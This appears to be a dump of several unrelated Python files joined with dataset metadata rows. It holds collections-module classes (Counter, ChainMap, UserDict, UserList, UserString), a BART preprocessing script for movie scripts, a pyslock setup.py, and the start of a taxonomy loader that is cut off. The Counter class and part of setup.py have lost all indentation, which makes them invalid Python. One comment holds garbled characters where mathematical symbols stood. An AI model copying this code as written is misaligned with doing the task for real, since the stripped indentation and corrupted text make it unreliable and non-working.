            raise ValueError(f'Got unexpected field names: {list(kwds)!r}')
        return result

    _replace.__doc__ = (f'Return a new {typename} object replacing specified '
                        'fields with new values')

    def __repr__(self):
        'Return a nicely formatted representation string'
        return self.__class__.__name__ + repr_fmt % self

    def _asdict(self):
        'Return a new dict which maps field names to their values.'
        return _dict(_zip(self._fields, self))

    def __getnewargs__(self):
        'Return self as a plain tuple. Used by copy and pickle.'
        return _tuple(self)

    # Fix up metadata to help introspection and debugging.
    for method in (
        __new__,
        _make.__func__,
        _replace,
        __repr__,
        _asdict,
        __getnewargs__,
    ):
        method.__qualname__ = f'{typename}.{method.__name__}'

    # --- Assemble the class namespace and build the class with type() ----
    class_namespace = {
        '__doc__': f'{typename}({arg_list})',
        '__slots__': (),
        '_fields': field_names,
        '_field_defaults': field_defaults,
        '__new__': __new__,
        '_make': _make,
        '_replace': _replace,
        '__repr__': __repr__,
        '_asdict': _asdict,
        '__getnewargs__': __getnewargs__,
    }
    for index, name in enumerate(field_names):
        doc = _sys.intern(f'Alias for field number {index}')
        class_namespace[name] = _tuplegetter(index, doc)

    result = type(typename, (tuple,), class_namespace)

    # For pickling to work, __module__ must name the caller's module.
    # Skip this where sys._getframe is unavailable (Jython) or limited
    # (IronPython), or when the caller specified a module explicitly.
    if module is None:
        try:
            module = _sys._getframe(1).f_globals.get('__name__', '__main__')
        except (AttributeError, ValueError):
            pass
    if module is not None:
        result.__module__ = module

    return result
########################################################################
### Counter
########################################################################
def _count_elements(mapping, iterable):
    """Tally elements from the iterable into mapping, in place."""
    get_count = mapping.get
    for element in iterable:
        mapping[element] = get_count(element, 0) + 1
try: # Load C helper function if available
from _collections import _count_elements
except ImportError:
pass
class Counter(dict):
'''Dict subclass for counting hashable items. Sometimes called a bag
or multiset. Elements are stored as dictionary keys and their counts
are stored as dictionary values.
>>> c = Counter('abcdeabcdabcaba') # count elements from a string
>>> c.most_common(3) # three most common elements
[('a', 5), ('b', 4), ('c', 3)]
>>> sorted(c) # list all unique elements
['a', 'b', 'c', 'd', 'e']
>>> ''.join(sorted(c.elements())) # list elements with repetitions
'aaaaabbbbcccdde'
>>> sum(c.values()) # total of all counts
15
>>> c['a'] # count of letter 'a'
5
>>> for elem in 'shazam': # update counts from an iterable
... c[elem] += 1 # by adding 1 to each element's count
>>> c['a'] # now there are seven 'a'
7
>>> del c['b'] # remove all 'b'
>>> c['b'] # now there are zero 'b'
0
>>> d = Counter('simsalabim') # make another counter
>>> c.update(d) # add in the second counter
>>> c['a'] # now there are nine 'a'
9
>>> c.clear() # empty the counter
>>> c
Counter()
Note: If a count is set to zero or reduced to zero, it will remain
in the counter until the entry is deleted or the counter is cleared:
>>> c = Counter('aaabbc')
>>> c['b'] -= 2 # reduce the count of 'b' by two
>>> c.most_common() # 'b' is still in, but its count is zero
[('a', 3), ('c', 1), ('b', 0)]
'''
# References:
# http://en.wikipedia.org/wiki/Multiset
# http://www.gnu.org/software/smalltalk/manual-base/html_node/Bag.html
# http://www.demo2s.com/Tutorial/Cpp/0380__set-multiset/Catalog0380__set-multiset.htm
# http://code.activestate.com/recipes/259174/
# Knuth, TAOCP Vol. II section 4.6.3
def __init__(*args, **kwds):
'''Create a new, empty Counter object. And if given, count elements
from an input iterable. Or, initialize the count from another mapping
of elements to their counts.
>>> c = Counter() # a new, empty counter
>>> c = Counter('gallahad') # a new counter from an iterable
>>> c = Counter({'a': 4, 'b': 2}) # a new counter from a mapping
>>> c = Counter(a=4, b=2) # a new counter from keyword args
'''
if not args:
raise TypeError("descriptor '__init__' of 'Counter' object "
"needs an argument")
self, *args = args
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
super(Counter, self).__init__()
self.update(*args, **kwds)
def __missing__(self, key):
'The count of elements not in the Counter is zero.'
# Needed so that self[missing_item] does not raise KeyError
return 0
def most_common(self, n=None):
'''List the n most common elements and their counts from the most
common to the least. If n is None, then list all element counts.
>>> Counter('abracadabra').most_common(3)
[('a', 5), ('b', 2), ('r', 2)]
'''
# Emulate Bag.sortedByCount from Smalltalk
if n is None:
return sorted(self.items(), key=_itemgetter(1), reverse=True)
return _heapq.nlargest(n, self.items(), key=_itemgetter(1))
def elements(self):
'''Iterator over elements repeating each as many times as its count.
>>> c = Counter('ABCABC')
>>> sorted(c.elements())
['A', 'A', 'B', 'B', 'C', 'C']
# Knuth's example for prime factors of 1836: 2**2 * 3**3 * 17**1
>>> prime_factors = Counter({2: 2, 3: 3, 17: 1})
>>> product = 1
>>> for factor in prime_factors.elements(): # loop over factors
... product *= factor # and multiply them
>>> product
1836
Note, if an element's count has been set to zero or is a negative
number, elements() will ignore it.
'''
# Emulate Bag.do from Smalltalk and Multiset.begin from C++.
return _chain.from_iterable(_starmap(_repeat, self.items()))
# Override dict methods where necessary
@classmethod
def fromkeys(cls, iterable, v=None):
# There is no equivalent method for counters because the semantics
# would be ambiguous in cases such as Counter.fromkeys('aaabbc', v=2).
# Initializing counters to zero values isn't necessary because zero
# is already the default value for counter lookups. Initializing
# to one is easily accomplished with Counter(set(iterable)). For
# more exotic cases, create a dictionary first using a dictionary
# comprehension or dict.fromkeys().
raise NotImplementedError(
'Counter.fromkeys() is undefined. Use Counter(iterable) instead.')
def update(*args, **kwds):
'''Like dict.update() but add counts instead of replacing them.
Source can be an iterable, a dictionary, or another Counter instance.
>>> c = Counter('which')
>>> c.update('witch') # add elements from another iterable
>>> d = Counter('watch')
>>> c.update(d) # add elements from another counter
>>> c['h'] # four 'h' in which, witch, and watch
4
'''
# The regular dict.update() operation makes no sense here because the
# replace behavior results in the some of original untouched counts
# being mixed-in with all of the other counts for a mismash that
# doesn't have a straight-forward interpretation in most counting
# contexts. Instead, we implement straight-addition. Both the inputs
# and outputs are allowed to contain zero and negative counts.
if not args:
raise TypeError("descriptor 'update' of 'Counter' object "
"needs an argument")
self, *args = args
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
iterable = args[0] if args else None
if iterable is not None:
if isinstance(iterable, _collections_abc.Mapping):
if self:
self_get = self.get
for elem, count in iterable.items():
self[elem] = count + self_get(elem, 0)
else:
# fast path when counter is empty
super(Counter, self).update(iterable)
else:
_count_elements(self, iterable)
if kwds:
self.update(kwds)
def subtract(*args, **kwds):
'''Like dict.update() but subtracts counts instead of replacing them.
Counts can be reduced below zero. Both the inputs and outputs are
allowed to contain zero and negative counts.
Source can be an iterable, a dictionary, or another Counter instance.
>>> c = Counter('which')
>>> c.subtract('witch') # subtract elements from another iterable
>>> c.subtract(Counter('watch')) # subtract elements from another counter
>>> c['h'] # 2 in which, minus 1 in witch, minus 1 in watch
0
>>> c['w'] # 1 in which, minus 1 in witch, minus 1 in watch
-1
'''
if not args:
raise TypeError("descriptor 'subtract' of 'Counter' object "
"needs an argument")
self, *args = args
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
iterable = args[0] if args else None
if iterable is not None:
self_get = self.get
if isinstance(iterable, _collections_abc.Mapping):
for elem, count in iterable.items():
self[elem] = self_get(elem, 0) - count
else:
for elem in iterable:
self[elem] = self_get(elem, 0) - 1
if kwds:
self.subtract(kwds)
def copy(self):
'Return a shallow copy.'
return self.__class__(self)
def __reduce__(self):
return self.__class__, (dict(self),)
def __delitem__(self, elem):
'Like dict.__delitem__() but does not raise KeyError for missing values.'
if elem in self:
super().__delitem__(elem)
def __repr__(self):
if not self:
return f'{self.__class__.__name__}()'
try:
# dict() preserves the ordering returned by most_common()
d = dict(self.most_common())
except TypeError:
# handle case where values are not orderable
d = dict(self)
return f'{self.__class__.__name__}({d!r})'
# Multiset-style mathematical operations discussed in:
# Knuth TAOCP Volume II section 4.6.3 exercise 19
# and at http://en.wikipedia.org/wiki/Multiset
#
# Outputs guaranteed to only include positive counts.
#
# To strip negative and zero counts, add-in an empty counter:
# c += Counter()
#
# Rich comparison operators for multiset subset and superset tests
# are deliberately omitted due to semantic conflicts with the
# existing inherited dict equality method. Subset and superset
# semantics ignore zero counts and require that pโคq โง pโฅq โ p=q;
# however, that would not be the case for p=Counter(a=1, b=0)
# and q=Counter(a=1) where the dictionaries are not equal.
def __add__(self, other):
'''Add counts from two counters.
>>> Counter('abbb') + Counter('bcc')
Counter({'b': 4, 'c': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
newcount = count + other[elem]
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count > 0:
result[elem] = count
return result
def __sub__(self, other):
''' Subtract count, but keep only results with positive counts.
>>> Counter('abbbc') - Counter('bccd')
Counter({'b': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
newcount = count - other[elem]
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count < 0:
result[elem] = 0 - count
return result
def __or__(self, other):
'''Union is the maximum of value in either of the input counters.
>>> Counter('abbb') | Counter('bcc')
Counter({'b': 3, 'c': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
other_count = other[elem]
newcount = other_count if count < other_count else count
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count > 0:
result[elem] = count
return result
def __and__(self, other):
''' Intersection is the minimum of corresponding counts.
>>> Counter('abbb') & Counter('bcc')
Counter({'b': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
other_count = other[elem]
newcount = count if count < other_count else other_count
if newcount > 0:
result[elem] = newcount
return result
def __pos__(self):
'Adds an empty counter, effectively stripping negative and zero counts'
result = Counter()
for elem, count in self.items():
if count > 0:
result[elem] = count
return result
def __neg__(self):
'''Subtracts from an empty counter. Strips positive and zero counts,
and flips the sign on negative counts.
'''
result = Counter()
for elem, count in self.items():
if count < 0:
result[elem] = 0 - count
return result
def _keep_positive(self):
'''Internal method to strip elements with a negative or zero count'''
nonpositive = [elem for elem, count in self.items() if not count > 0]
for elem in nonpositive:
del self[elem]
return self
def __iadd__(self, other):
'''Inplace add from another counter, keeping only positive counts.
>>> c = Counter('abbb')
>>> c += Counter('bcc')
>>> c
Counter({'b': 4, 'c': 2, 'a': 1})
'''
for elem, count in other.items():
self[elem] += count
return self._keep_positive()
def __isub__(self, other):
'''Inplace subtract counter, but keep only results with positive counts.
>>> c = Counter('abbbc')
>>> c -= Counter('bccd')
>>> c
Counter({'b': 2, 'a': 1})
'''
for elem, count in other.items():
self[elem] -= count
return self._keep_positive()
def __ior__(self, other):
'''Inplace union is the maximum of value from either counter.
>>> c = Counter('abbb')
>>> c |= Counter('bcc')
>>> c
Counter({'b': 3, 'c': 2, 'a': 1})
'''
for elem, other_count in other.items():
count = self[elem]
if other_count > count:
self[elem] = other_count
return self._keep_positive()
def __iand__(self, other):
'''Inplace intersection is the minimum of corresponding counts.
>>> c = Counter('abbb')
>>> c &= Counter('bcc')
>>> c
Counter({'b': 1})
'''
for elem, count in self.items():
other_count = other[elem]
if other_count < count:
self[elem] = other_count
return self._keep_positive()
########################################################################
### ChainMap
########################################################################
class ChainMap(_collections_abc.MutableMapping):
    """Group multiple dicts (or other mappings) into a single, updateable
    view.

    The underlying mappings are stored in the public *maps* list; there is
    no other state.  Lookups search the maps in order until a key is found,
    while writes, updates, and deletions apply only to the first mapping.
    """

    def __init__(self, *maps):
        """Initialize with the given mappings.  If none are provided, a
        single empty dictionary is used.
        """
        self.maps = list(maps) or [{}]  # always at least one map

    def __missing__(self, key):
        raise KeyError(key)

    def __getitem__(self, key):
        for mapping in self.maps:
            try:
                # Can't use 'key in mapping' here: that would bypass the
                # __missing__ hook of maps such as defaultdict.
                return mapping[key]
            except KeyError:
                pass
        # Give subclasses that define __missing__ the final word.
        return self.__missing__(key)

    def get(self, key, default=None):
        return self[key] if key in self else default

    def __len__(self):
        # set.union reuses stored hash values if possible.
        return len(set().union(*self.maps))

    def __iter__(self):
        d = {}
        for mapping in reversed(self.maps):
            d.update(dict.fromkeys(mapping))  # reuses stored hash values
        return iter(d)

    def __contains__(self, key):
        return any(key in m for m in self.maps)

    def __bool__(self):
        return any(self.maps)

    @_recursive_repr()
    def __repr__(self):
        return f'{self.__class__.__name__}({", ".join(map(repr, self.maps))})'

    @classmethod
    def fromkeys(cls, iterable, *args):
        """Create a ChainMap with a single dict created from the iterable."""
        return cls(dict.fromkeys(iterable, *args))

    def copy(self):
        """New ChainMap or subclass with a new copy of maps[0] and
        references to maps[1:].
        """
        return self.__class__(self.maps[0].copy(), *self.maps[1:])

    __copy__ = copy

    def new_child(self, m=None):
        """New ChainMap with a new map followed by all previous maps.  If
        no map is provided, an empty dict is used.  (Like Django's
        Context.push().)
        """
        if m is None:
            m = {}
        return self.__class__(m, *self.maps)

    @property
    def parents(self):
        """New ChainMap from maps[1:].  (Like Django's Context.pop().)"""
        return self.__class__(*self.maps[1:])

    def __setitem__(self, key, value):
        self.maps[0][key] = value

    def __delitem__(self, key):
        try:
            del self.maps[0][key]
        except KeyError:
            raise KeyError(f'Key not found in the first mapping: {key!r}')

    def popitem(self):
        """Remove and return an item pair from maps[0]; raise KeyError if
        maps[0] is empty.
        """
        try:
            return self.maps[0].popitem()
        except KeyError:
            raise KeyError('No keys found in the first mapping.')

    def pop(self, key, *args):
        """Remove *key* from maps[0] and return its value; raise KeyError
        if *key* is not in maps[0].
        """
        try:
            return self.maps[0].pop(key, *args)
        except KeyError:
            raise KeyError(f'Key not found in the first mapping: {key!r}')

    def clear(self):
        """Clear maps[0], leaving maps[1:] intact."""
        self.maps[0].clear()

    def __ior__(self, other):
        self.maps[0].update(other)
        return self

    def __or__(self, other):
        if not isinstance(other, _collections_abc.Mapping):
            return NotImplemented
        m = self.copy()
        m.maps[0].update(other)
        return m

    def __ror__(self, other):
        if not isinstance(other, _collections_abc.Mapping):
            return NotImplemented
        # Flatten self into a plain dict, deepest map first so that
        # earlier maps win, with *other* providing the base layer.
        m = dict(other)
        for child in reversed(self.maps):
            m.update(child)
        return self.__class__(m)
################################################################################
### UserDict
################################################################################
class UserDict(_collections_abc.MutableMapping):
    """A wrapper around a real dict, kept in the *data* attribute, that is
    easier to subclass safely than dict itself.
    """

    # -- Abstract-method implementations ----------------------------------

    def __init__(*args, **kwargs):
        # 'self' is pulled out of *args so a keyword argument named 'self'
        # still lands in the dictionary.
        if not args:
            raise TypeError("descriptor '__init__' of 'UserDict' object "
                            "needs an argument")
        self, *args = args
        if len(args) > 1:
            raise TypeError('expected at most 1 arguments, got %d' % len(args))
        if args:
            dict = args[0]
        elif 'dict' in kwargs:
            dict = kwargs.pop('dict')
            import warnings
            warnings.warn("Passing 'dict' as keyword argument is deprecated",
                          DeprecationWarning, stacklevel=2)
        else:
            dict = None
        self.data = {}
        if dict is not None:
            self.update(dict)
        if len(kwargs):
            self.update(kwargs)

    def __len__(self):
        return len(self.data)

    def __bool__(self):
        return bool(self.data)

    def __getitem__(self, key):
        if key in self.data:
            return self.data[key]
        if hasattr(self.__class__, "__missing__"):
            return self.__class__.__missing__(self, key)
        raise KeyError(key)

    def __setitem__(self, key, item):
        self.data[key] = item

    def __delitem__(self, key):
        del self.data[key]

    def __iter__(self):
        return iter(self.data)

    def __contains__(self, key):
        # Defined explicitly so containment works correctly even when a
        # subclass supplies __missing__.
        return key in self.data

    # -- Methods that dicts have but MutableMapping does not ---------------

    def __repr__(self):
        return repr(self.data)

    def __or__(self, other):
        if isinstance(other, UserDict):
            return self.__class__(self.data | other.data)
        if isinstance(other, dict):
            return self.__class__(self.data | other)
        return NotImplemented

    def __ror__(self, other):
        if isinstance(other, UserDict):
            return self.__class__(other.data | self.data)
        if isinstance(other, dict):
            return self.__class__(other | self.data)
        return NotImplemented

    def __ior__(self, other):
        if isinstance(other, UserDict):
            self.data |= other.data
        else:
            self.data |= other
        return self

    def __copy__(self):
        inst = self.__class__.__new__(self.__class__)
        inst.__dict__.update(self.__dict__)
        # Copy 'data' directly through __dict__ to avoid triggering
        # descriptors defined by subclasses.
        inst.__dict__["data"] = self.__dict__["data"].copy()
        return inst

    def __sizeof__(self):
        return _sys.getsizeof(self.data)

    def copy(self):
        if self.__class__ is UserDict:
            return UserDict(self.data.copy())
        # For subclasses: temporarily detach 'data' so copy.copy() does not
        # share it, then rebuild the contents with update().
        import copy
        data = self.data
        try:
            self.data = {}
            c = copy.copy(self)
        finally:
            self.data = data
        c.update(self)
        return c

    @classmethod
    def fromkeys(cls, iterable, value=None):
        d = cls()
        for key in iterable:
            d[key] = value
        return d
################################################################################
### UserList
################################################################################
class UserList(_collections_abc.MutableSequence):
    """A more or less complete user-defined wrapper around list objects,
    with the underlying list kept in the *data* attribute.
    """

    def __init__(self, initlist=None):
        self.data = []
        if initlist is not None:
            # XXX should this accept an arbitrary sequence?
            if type(initlist) == type(self.data):
                self.data[:] = initlist
            elif isinstance(initlist, UserList):
                self.data[:] = initlist.data[:]
            else:
                self.data = list(initlist)

    def __repr__(self):
        return repr(self.data)

    # Comparisons delegate to the wrapped list, unwrapping UserList
    # operands via __cast.

    def __lt__(self, other):
        return self.data < self.__cast(other)

    def __le__(self, other):
        return self.data <= self.__cast(other)

    def __eq__(self, other):
        return self.data == self.__cast(other)

    def __gt__(self, other):
        return self.data > self.__cast(other)

    def __ge__(self, other):
        return self.data >= self.__cast(other)

    def __cast(self, other):
        return other.data if isinstance(other, UserList) else other

    def __contains__(self, item):
        return item in self.data

    def __len__(self):
        return len(self.data)

    def __bool__(self):
        return bool(self.data)

    def __getitem__(self, i):
        # Slicing returns an instance of the same class; indexing returns
        # the raw element.
        if isinstance(i, slice):
            return self.__class__(self.data[i])
        else:
            return self.data[i]

    def __setitem__(self, i, item):
        self.data[i] = item

    def __delitem__(self, i):
        del self.data[i]

    def __add__(self, other):
        if isinstance(other, UserList):
            return self.__class__(self.data + other.data)
        elif isinstance(other, type(self.data)):
            return self.__class__(self.data + other)
        return self.__class__(self.data + list(other))

    def __radd__(self, other):
        if isinstance(other, UserList):
            return self.__class__(other.data + self.data)
        elif isinstance(other, type(self.data)):
            return self.__class__(other + self.data)
        return self.__class__(list(other) + self.data)

    def __iadd__(self, other):
        if isinstance(other, UserList):
            self.data += other.data
        elif isinstance(other, type(self.data)):
            self.data += other
        else:
            self.data += list(other)
        return self

    def __mul__(self, n):
        return self.__class__(self.data * n)

    __rmul__ = __mul__

    def __imul__(self, n):
        self.data *= n
        return self

    def __copy__(self):
        inst = self.__class__.__new__(self.__class__)
        inst.__dict__.update(self.__dict__)
        # Copy 'data' directly through __dict__ to avoid triggering
        # descriptors defined by subclasses.
        inst.__dict__["data"] = self.__dict__["data"][:]
        return inst

    def __sizeof__(self):
        return _sys.getsizeof(self.data)

    # Mutating and query methods simply forward to the wrapped list.

    def append(self, item):
        self.data.append(item)

    def insert(self, i, item):
        self.data.insert(i, item)

    def pop(self, i=-1):
        return self.data.pop(i)

    def remove(self, item):
        self.data.remove(item)

    def clear(self):
        self.data.clear()

    def copy(self):
        return self.__class__(self)

    def count(self, item):
        return self.data.count(item)

    def index(self, item, *args):
        return self.data.index(item, *args)

    def reverse(self):
        self.data.reverse()

    def sort(self, /, *args, **kwds):
        self.data.sort(*args, **kwds)

    def extend(self, other):
        if isinstance(other, UserList):
            self.data.extend(other.data)
        else:
            self.data.extend(other)
################################################################################
### UserString
################################################################################
class UserString(_collections_abc.Sequence):
    """A user-defined wrapper around string objects, with the wrapped
    string kept in the *data* attribute.  Operations that produce strings
    return instances of the (sub)class.
    """

    def __init__(self, seq):
        if isinstance(seq, str):
            self.data = seq
        elif isinstance(seq, UserString):
            self.data = seq.data[:]
        else:
            self.data = str(seq)

    # -- Conversions and core protocol -------------------------------------

    def __str__(self):
        return str(self.data)

    def __repr__(self):
        return repr(self.data)

    def __int__(self):
        return int(self.data)

    def __float__(self):
        return float(self.data)

    def __complex__(self):
        return complex(self.data)

    def __hash__(self):
        return hash(self.data)

    def __getnewargs__(self):
        return (self.data[:],)

    # Comparisons unwrap UserString operands and delegate to str.

    def __eq__(self, string):
        if isinstance(string, UserString):
            return self.data == string.data
        return self.data == string

    def __lt__(self, string):
        if isinstance(string, UserString):
            return self.data < string.data
        return self.data < string

    def __le__(self, string):
        if isinstance(string, UserString):
            return self.data <= string.data
        return self.data <= string

    def __gt__(self, string):
        if isinstance(string, UserString):
            return self.data > string.data
        return self.data > string

    def __ge__(self, string):
        if isinstance(string, UserString):
            return self.data >= string.data
        return self.data >= string

    def __contains__(self, char):
        if isinstance(char, UserString):
            char = char.data
        return char in self.data

    def __bool__(self):
        return bool(self.data)

    def __len__(self):
        return len(self.data)

    def __getitem__(self, index):
        return self.__class__(self.data[index])

    def __add__(self, other):
        if isinstance(other, UserString):
            return self.__class__(self.data + other.data)
        elif isinstance(other, str):
            return self.__class__(self.data + other)
        return self.__class__(self.data + str(other))

    def __radd__(self, other):
        if isinstance(other, str):
            return self.__class__(other + self.data)
        return self.__class__(str(other) + self.data)

    def __mul__(self, n):
        return self.__class__(self.data * n)

    __rmul__ = __mul__

    def __mod__(self, args):
        return self.__class__(self.data % args)

    def __rmod__(self, template):
        return self.__class__(str(template) % self)

    def __sizeof__(self):
        return _sys.getsizeof(self.data)

    # -- str methods, defined in alphabetical order ------------------------

    def capitalize(self):
        return self.__class__(self.data.capitalize())

    def casefold(self):
        return self.__class__(self.data.casefold())

    def center(self, width, *args):
        return self.__class__(self.data.center(width, *args))

    def count(self, sub, start=0, end=_sys.maxsize):
        if isinstance(sub, UserString):
            sub = sub.data
        return self.data.count(sub, start, end)

    def removeprefix(self, prefix, /):
        if isinstance(prefix, UserString):
            prefix = prefix.data
        return self.__class__(self.data.removeprefix(prefix))

    def removesuffix(self, suffix, /):
        if isinstance(suffix, UserString):
            suffix = suffix.data
        return self.__class__(self.data.removesuffix(suffix))

    def encode(self, encoding='utf-8', errors='strict'):
        encoding = 'utf-8' if encoding is None else encoding
        errors = 'strict' if errors is None else errors
        return self.data.encode(encoding, errors)

    def endswith(self, suffix, start=0, end=_sys.maxsize):
        return self.data.endswith(suffix, start, end)

    def expandtabs(self, tabsize=8):
        return self.__class__(self.data.expandtabs(tabsize))

    def find(self, sub, start=0, end=_sys.maxsize):
        if isinstance(sub, UserString):
            sub = sub.data
        return self.data.find(sub, start, end)

    def format(self, /, *args, **kwds):
        return self.data.format(*args, **kwds)

    def format_map(self, mapping):
        return self.data.format_map(mapping)

    def index(self, sub, start=0, end=_sys.maxsize):
        return self.data.index(sub, start, end)

    def isalpha(self):
        return self.data.isalpha()

    def isalnum(self):
        return self.data.isalnum()

    def isascii(self):
        return self.data.isascii()

    def isdecimal(self):
        return self.data.isdecimal()

    def isdigit(self):
        return self.data.isdigit()

    def isidentifier(self):
        return self.data.isidentifier()

    def islower(self):
        return self.data.islower()

    def isnumeric(self):
        return self.data.isnumeric()

    def isprintable(self):
        return self.data.isprintable()

    def isspace(self):
        return self.data.isspace()

    def istitle(self):
        return self.data.istitle()

    def isupper(self):
        return self.data.isupper()

    def join(self, seq):
        return self.data.join(seq)

    def ljust(self, width, *args):
        return self.__class__(self.data.ljust(width, *args))

    def lower(self):
        return self.__class__(self.data.lower())

    def lstrip(self, chars=None):
        return self.__class__(self.data.lstrip(chars))

    maketrans = str.maketrans

    def partition(self, sep):
        return self.data.partition(sep)

    def replace(self, old, new, maxsplit=-1):
        if isinstance(old, UserString):
            old = old.data
        if isinstance(new, UserString):
            new = new.data
        return self.__class__(self.data.replace(old, new, maxsplit))

    def rfind(self, sub, start=0, end=_sys.maxsize):
        if isinstance(sub, UserString):
            sub = sub.data
        return self.data.rfind(sub, start, end)

    def rindex(self, sub, start=0, end=_sys.maxsize):
        return self.data.rindex(sub, start, end)

    def rjust(self, width, *args):
        return self.__class__(self.data.rjust(width, *args))

    def rpartition(self, sep):
        return self.data.rpartition(sep)

    def rstrip(self, chars=None):
        return self.__class__(self.data.rstrip(chars))

    def split(self, sep=None, maxsplit=-1):
        return self.data.split(sep, maxsplit)

    def rsplit(self, sep=None, maxsplit=-1):
        return self.data.rsplit(sep, maxsplit)

    def splitlines(self, keepends=False):
        return self.data.splitlines(keepends)

    def startswith(self, prefix, start=0, end=_sys.maxsize):
        return self.data.startswith(prefix, start, end)

    def strip(self, chars=None):
        return self.__class__(self.data.strip(chars))

    def swapcase(self):
        return self.__class__(self.data.swapcase())

    def title(self):
        return self.__class__(self.data.title())

    def translate(self, *args):
        return self.__class__(self.data.translate(*args))

    def upper(self):
        return self.__class__(self.data.upper())

    def zfill(self, width):
        return self.__class__(self.data.zfill(width))
ace8dbb303b7f35de08ef0d1f0041f4c28e4ad58 | 748 | py | Python | baselines/BART/sprep.py | shahhaard47/Script-Generation | a9a5ebfedbfb40c2c023ed042c22a6523e38ed9b | [
"MIT"
] | 1 | 2021-09-02T21:57:09.000Z | 2021-09-02T21:57:09.000Z | baselines/BART/sprep.py | shahhaard47/Script-Generation | a9a5ebfedbfb40c2c023ed042c22a6523e38ed9b | [
"MIT"
] | 3 | 2021-02-02T22:50:13.000Z | 2022-03-12T00:36:27.000Z | baselines/BART/sprep.py | shahhaard47/Script-Generation | a9a5ebfedbfb40c2c023ed042c22a6523e38ed9b | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
def flines(f, l):
    """Write the strings in `l` to file object `f`, one per line, with no
    trailing newline after the last entry.

    Fix: the original indexed l[-1] and therefore raised IndexError on an
    empty list; an empty list now writes nothing.
    """
    f.write('\n'.join(l))
# Build BART-style source/target pairs from movie scripts: each script is cut
# into consecutive 56-word chunks; the first 3/4 become training pairs and
# the last 1/4 validation pairs (target = source shifted by one chunk).
df = pd.read_csv("genre.csv")
f = open("train.source","w")
f2 = open("train.target","w")
f3 = open("val.source","w")
f4 = open("val.target","w")
# NOTE(review): only the first 10 rows are processed and the four file
# handles are never closed -- confirm whether both are intentional.
for i in range(10):
    # Strip non-ASCII characters; the str(bytes(...)) round-trip leaves a
    # literal "b'...'" wrapper, hence the [1:] slice and the escaped-quote
    # cleanup before splitting into words.
    dl = str(bytes(' '.join(df.loc[i,"script"].split()),'utf-8').decode('ascii','ignore').encode("ascii"))[1:].replace(r'\'','\'').split()
    if(len(dl)<100):
        continue
    print(df.iloc[i,0])
    dl2 = []
    # The inner loop reuses the name `i` (harmless: the outer `i` is not
    # read again after this point within the iteration).
    for i in range(0,len(dl),56):
        dl2.append(' '.join(dl[i:i+56]))
    lim = (len(dl2)*3)//4
    flines(f,dl2[:lim-1])
    flines(f2,dl2[1:lim])
    flines(f3,dl2[lim:-1])
    flines(f4,dl2[lim+1:])
ace8dc41927d431bcfb5885ac51316960817bec1 | 806 | py | Python | setup.py | snower/pyslock | 9f81cc890056496878ad4f19adb58754ee3f2401 | [
"MIT"
] | null | null | null | setup.py | snower/pyslock | 9f81cc890056496878ad4f19adb58754ee3f2401 | [
"MIT"
] | null | null | null | setup.py | snower/pyslock | 9f81cc890056496878ad4f19adb58754ee3f2401 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# 14-8-8
# create by: snower
import os
from setuptools import find_packages, setup
if os.path.exists("README.md"):
with open("README.md") as fp:
long_description = fp.read()
else:
long_description = 'https://github.com/snower/syncany'
setup(
name='pyslock',
version='0.0.1',
packages=find_packages(),
install_requires=[],
author='snower',
author_email='sujian199@gmail.com',
url='https://github.com/snower/pyslock',
license='MIT',
keywords=[
"shared lock", "slock"
],
package_data={
'': ['README.md'],
},
description='High-performance distributed shared lock service client driver',
long_description=long_description,
long_description_content_type='text/markdown',
zip_safe=False,
)
| 23.705882 | 81 | 0.650124 |
ace8de8bb489091a790de5ae1275c7fcc131120f | 8,725 | py | Python | CAT_pack/tax.py | diegocambuy/CAT | d77355050b9f4140ad864cc1789c22523481e3d3 | [
"MIT"
] | null | null | null | CAT_pack/tax.py | diegocambuy/CAT | d77355050b9f4140ad864cc1789c22523481e3d3 | [
"MIT"
] | 4 | 2016-09-06T11:55:09.000Z | 2016-11-11T01:31:10.000Z | CAT_pack/tax.py | diegocambuy/CAT | d77355050b9f4140ad864cc1789c22523481e3d3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import sys
import shared
def import_nodes(nodes_dmp, log_file, quiet):
    """Parse an NCBI taxonomy nodes.dmp file.

    Returns a (taxid2parent, taxid2rank) tuple of dicts mapping each taxid
    (str) to its parent taxid and to its rank name, respectively.
    """
    message = 'Loading file {0}.'.format(nodes_dmp)
    shared.give_user_feedback(message, log_file, quiet)
    taxid2parent = {}
    taxid2rank = {}
    with open(nodes_dmp, 'r') as f1:
        for line in f1:
            # nodes.dmp columns are separated by "\t|\t": field 0 is the
            # taxid, field 2 the parent taxid, field 4 the rank.
            line = line.split('\t')
            taxid = line[0]
            parent = line[2]
            rank = line[4]
            taxid2parent[taxid] = parent
            taxid2rank[taxid] = rank
    return (taxid2parent, taxid2rank)
def import_names(names_dmp, log_file, quiet):
    """Parse NCBI names.dmp into a {taxid: scientific name} dict.

    Only rows flagged 'scientific name' are kept (one per taxid).
    """
    message = 'Loading file {0}.'.format(names_dmp)
    shared.give_user_feedback(message, log_file, quiet)
    taxid2name = {}
    with open(names_dmp, 'r') as f1:
        for line in f1:
            line = line.split('\t')
            if line[6] == 'scientific name':
                taxid = line[0]
                name = line[2]
                taxid2name[taxid] = name
    return taxid2name
def import_fastaid2LCAtaxid(fastaid2LCAtaxid_file, all_hits, log_file, quiet):
    """Load the fasta-id -> LCA-taxid mapping, restricted to ids in all_hits."""
    message = 'Loading file {0}.'.format(fastaid2LCAtaxid_file)
    shared.give_user_feedback(message, log_file, quiet)
    mapping = {}
    with open(fastaid2LCAtaxid_file, 'r') as handle:
        for raw_line in handle:
            fields = raw_line.rstrip().split('\t')
            # Only include fastaids that are found in hits.
